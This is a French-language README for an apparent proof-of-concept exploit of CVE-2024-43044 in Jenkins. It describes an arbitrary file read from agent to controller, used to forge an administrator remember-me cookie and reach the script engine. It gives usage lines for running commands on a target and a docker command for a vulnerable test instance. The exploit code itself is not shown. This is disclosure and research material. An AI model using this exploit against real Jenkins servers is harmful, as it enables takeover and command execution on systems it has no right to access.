
Exploit pour la vulnérabilité CVE-2024-43044 dans Jenkins
Ceci est un exploit pour CVE-2024-43044, une lecture arbitraire de fichier qui permet à un agent de récupérer des fichiers depuis le contrôleur.
L'exploit utilisera la vulnérabilité pour lire des fichiers afin de forger un cookie remember-me pour un compte administrateur et obtenir un accès au moteur de script de Jenkins.
Consultez l'article complet à l'adresse https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
mvn package
Exploit Usages:
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
java -jar exploit.jar mode_attach <jenkinsUrl> <cmd>
java -jar exploit.jar mode_attach <cmd>
Vous pouvez le tester dans une version vulnérable en utilisant docker :
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17
Une fois que vous avez un Jenkins en cours d'exécution, configurez un agent.
La connexion contrôleur/agent peut être soit par défaut (en utilisant url, nom de nœud, secret) soit via SSH.
.